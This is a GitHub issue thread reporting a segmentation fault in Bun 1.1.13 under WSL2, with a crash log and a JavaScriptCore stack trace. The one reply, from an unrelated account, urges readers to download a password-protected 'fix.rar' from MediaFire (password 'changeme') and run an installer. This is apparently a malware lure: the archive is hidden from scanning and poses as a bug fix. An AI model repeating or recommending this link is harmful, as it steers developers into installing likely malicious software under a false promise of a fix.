### ISSUE TITLE
I use elysiajs and wsl2

### ISSUE THREAD

**Issue by SergioLoredoF** [oven-sh/bun#13550]
### How can we reproduce the crash?

(❁´◡`❁)

### Relevant log output

```shell
Bun v1.1.13 (bd6a6051) Linux x64
Args: "bun" "server.ts"
Features: jsc fetch(3) http_server transpiler_cache(5) tsconfig(2) 
Builtins: "bun:main" "node:assert" "node:buffer" "node:constants" "node:crypto" "node:events" "node:fs" "node:os" "node:path" "node:stream" "node:string_decoder" "node:util" "node:util/types" "node:zlib"
Elapsed: 23569ms | User: 15000ms | Sys: 925ms
RSS: 0.87GB | Peak: 1.07GB | Commit: 0.87GB | Faults: 0

panic: Segmentation fault at address 0x0
oh no: Bun has crashed. This indicates a bug in Bun, not your code.

To send a redacted crash report to Bun's team,
please file a GitHub issue using the link below:
```

### Stack Trace (bun.report)

Bun v1.1.13 ([`bd6a605`](<https://github.com/oven-sh/bun/tree/bd6a6051203ff577240615ff4e242270035a36b7>)) on linux x86_64 [AutoCommand]

Segmentation fault at address 0x00000000

- [`ld-temp.o:0`](<https://github.com/oven-sh/bun/blob/bd6a6051203ff577240615ff4e242270035a36b7/ld-temp.o#L0>): `JSC::DFG::CommonData::~CommonData`
- [`ld-temp.o:0`](<https://github.com/oven-sh/bun/blob/bd6a6051203ff577240615ff4e242270035a36b7/ld-temp.o#L0>): `JSC::FTL::JITCode::~JITCode`
- [`ld-temp.o:0`](<https://github.com/oven-sh/bun/blob/bd6a6051203ff577240615ff4e242270035a36b7/ld-temp.o#L0>): `JSC::HeapCellType::finishSweep`
- [`ld-temp.o:0`](<https://github.com/oven-sh/bun/blob/bd6a6051203ff577240615ff4e242270035a36b7/ld-temp.o#L0>): `JSC::MarkedBlock::Handle::sweep`
- [`ld-temp.o:0`](<https://github.com/oven-sh/bun/blob/bd6a6051203ff577240615ff4e242270035a36b7/ld-temp.o#L0>): `JSC::VM::~VM`
- [`ThreadSafeRefCounted.h:144`](<https://github.com/oven-sh/bun/blob/bd6a6051203ff577240615ff4e242270035a36b7//build/bun/bun-webkit/include/wtf/ThreadSafeRefCounted.h#L144>): `WebWorker__dispatchExit`
- [`web_worker.zig:412`](<https://github.com/oven-sh/bun/blob/bd6a6051203ff577240615ff4e242270035a36b7/src/bun.js/web_worker.zig#L412>): `src.bun.js.web_worker.WebWorker.exitAndDeinit`
- [`web_worker.zig:0`](<https://github.com/oven-sh/bun/blob/bd6a6051203ff577240615ff4e242270035a36b7/src/bun.js/web_worker.zig#L0>): `src.bun.js.javascript.OpaqueWrap__anon_489422__struct_501811.callback`

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
